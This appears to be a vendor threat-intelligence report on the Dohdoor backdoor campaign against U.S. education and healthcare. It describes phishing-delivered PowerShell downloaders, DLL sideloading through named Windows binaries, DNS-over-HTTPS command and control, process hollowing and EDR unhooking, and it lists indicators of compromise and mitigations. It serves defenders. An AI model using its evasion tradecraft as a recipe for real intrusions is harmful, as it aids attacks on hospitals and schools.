Executive Summary

The threat actor UAT-10027 has launched a sophisticated cyber campaign targeting the U.S. education and healthcare sectors, deploying a novel backdoor known as Dohdoor. This malware leverages DNS-over-HTTPS (DoH) for covert command-and-control (C2) communications, enabling it to bypass traditional network monitoring and security controls. The campaign, active since at least December 2025, utilizes advanced evasion techniques such as DLL sideloading, process hollowing, and endpoint detection and response (EDR) bypass. Technical analysis suggests a low-confidence attribution to North Korean advanced persistent threat (APT) groups, particularly Lazarus, based on overlapping tactics, techniques, and procedures (TTPs). The campaign’s primary objectives appear to be persistent access, lateral movement, and the deployment of additional payloads, including Cobalt Strike beacons, for post-exploitation activities.

Threat Actor Profile

UAT-10027 is an emerging threat cluster exhibiting operational sophistication and a focus on high-value targets within the U.S. education and healthcare verticals. The group’s tradecraft demonstrates a deep understanding of Windows internals and security controls, as evidenced by their use of living-off-the-land binaries (LOLBins), dynamic API resolution, and anti-forensic measures. While definitive attribution remains elusive, the campaign’s technical overlaps with Lazarus—including custom XOR-SUB decryption routines, DoH-based C2, and process hollowing—suggest a possible North Korean nexus. The group’s victimology also aligns with previous campaigns attributed to Kimsuky (education sector) and Maui ransomware (healthcare sector), further supporting this assessment.

Technical Analysis of Malware/TTPs

The Dohdoor backdoor is delivered via a multi-stage attack chain, beginning with phishing emails containing malicious PowerShell scripts. These scripts retrieve and execute a Windows batch file from a remote server, which in turn downloads a malicious DLL masquerading as a legitimate Windows component (such as propsys.dll or batmeter.dll). The batch script employs DLL sideloading by invoking trusted Windows executables—Fondue.exe, mblctr.exe, and ScreenClippingHost.exe—to load the malicious DLL into memory.

Once executed, Dohdoor performs several anti-forensic actions, including clearing the Run command history, wiping the clipboard, and self-deletion to minimize forensic artifacts. The malware dynamically resolves Windows API functions using hash-based lookups, complicating static analysis and signature-based detection.

For C2 communications, Dohdoor utilizes DoH queries to resolve attacker-controlled domains via Cloudflare’s DNS service. This approach encrypts DNS traffic and blends malicious activity with legitimate HTTPS traffic, effectively bypassing conventional DNS monitoring. The malware establishes HTTPS tunnels to Cloudflare edge nodes, further obfuscating its C2 traffic.

Dohdoor is capable of downloading encrypted secondary payloads—most notably Cobalt Strike beacons—which are injected into legitimate Windows processes using process hollowing. Targeted binaries for injection include OpenWith.exe, wksprt.exe, ImagingDevices.exe, and wab.exe. To evade EDR solutions, Dohdoor unhooks system calls in ntdll.dll, neutralizing user-mode hooks commonly used for behavioral monitoring.

Exploitation in the Wild

The campaign has been observed targeting U.S. education and healthcare organizations, exploiting the widespread use of Windows systems and the prevalence of remote work infrastructure. Initial access is typically achieved through spear-phishing emails containing obfuscated PowerShell downloaders. The attackers leverage LOLBins for DLL sideloading, ensuring that malicious code is executed within the context of trusted system processes. C2 infrastructure is concealed behind Cloudflare, and the use of non-traditional top-level domains (TLDs) with irregular capitalization further complicates detection. Post-exploitation activities include the deployment of Cobalt Strike for lateral movement, credential harvesting, and data exfiltration.

Victimology and Targeting

The primary victims of this campaign are organizations within the U.S. education and healthcare sectors. These industries are attractive targets due to their large attack surfaces, legacy infrastructure, and the sensitive nature of the data they handle. The campaign’s targeting aligns with previous North Korean APT operations, which have historically focused on sectors with valuable intellectual property, personal data, and critical infrastructure. The use of phishing as an initial access vector exploits the high volume of email communication and the often limited cybersecurity awareness among end users in these sectors.

Mitigation and Countermeasures

Organizations are advised to implement a multi-layered defense strategy to mitigate the risk posed by Dohdoor and similar threats. Key recommendations include monitoring for suspicious PowerShell and batch script executions, particularly those that invoke curl.exe to download remote scripts. Network defenders should scrutinize DNS-over-HTTPS traffic, especially outbound connections to Cloudflare with anomalous subdomains or TLDs. Deploy and regularly update ClamAV and Snort signatures specific to Dohdoor and its associated artifacts. Endpoint monitoring should focus on detecting process hollowing and DLL sideloading activity within legitimate Windows binaries such as Fondue.exe, mblctr.exe, and ScreenClippingHost.exe.

Threat hunters should proactively search for the provided indicators of compromise (IOCs), including suspicious domains (MswInSofTUpDloAd.OnLiNe, DEEPinSPeCTioNsyStEM.DeSigN), JA3S hash (466556e923186364e82cbdb4cad8df2c), and TLS certificate serial (7FF31977972C224A76155D13B6D685E3). Investigate any use of these IOCs in endpoint and network logs, and pay particular attention to hidden workspace folders in C:\ProgramData or C:\Users\Public and the presence of malicious DLLs named after legitimate Windows components.

User awareness training should be reinforced to reduce the risk of successful phishing attacks. Organizations should also consider restricting the execution of unsigned scripts and enforcing application whitelisting policies to limit the abuse of LOLBins.

References

Cisco Talos Blog: New Dohdoor malware campaign targets education and health care: https://blog.talosintelligence.com/new-dohdoor-malware-campaign/

The Hacker News: UAT-10027 Targets U.S. Education and Healthcare with Dohdoor Backdoor: https://thehackernews.com/2026/02/uat-10027-targets-us-education-and.html

Cisco Talos IOCs GitHub Repository: https://github.com/Cisco-Talos/IOCs

MITRE ATT&CK: Lazarus Group: https://attack.mitre.org/groups/G0032/

About Rescana

Rescana empowers organizations to proactively manage third-party cyber risk with our advanced TPRM platform, providing continuous monitoring, automated risk assessments, and actionable intelligence. Our platform enables security teams to identify, prioritize, and mitigate threats across their extended supply chain, ensuring resilience against evolving cyber adversaries. For questions or further information, we are happy to assist at ops@rescana.com.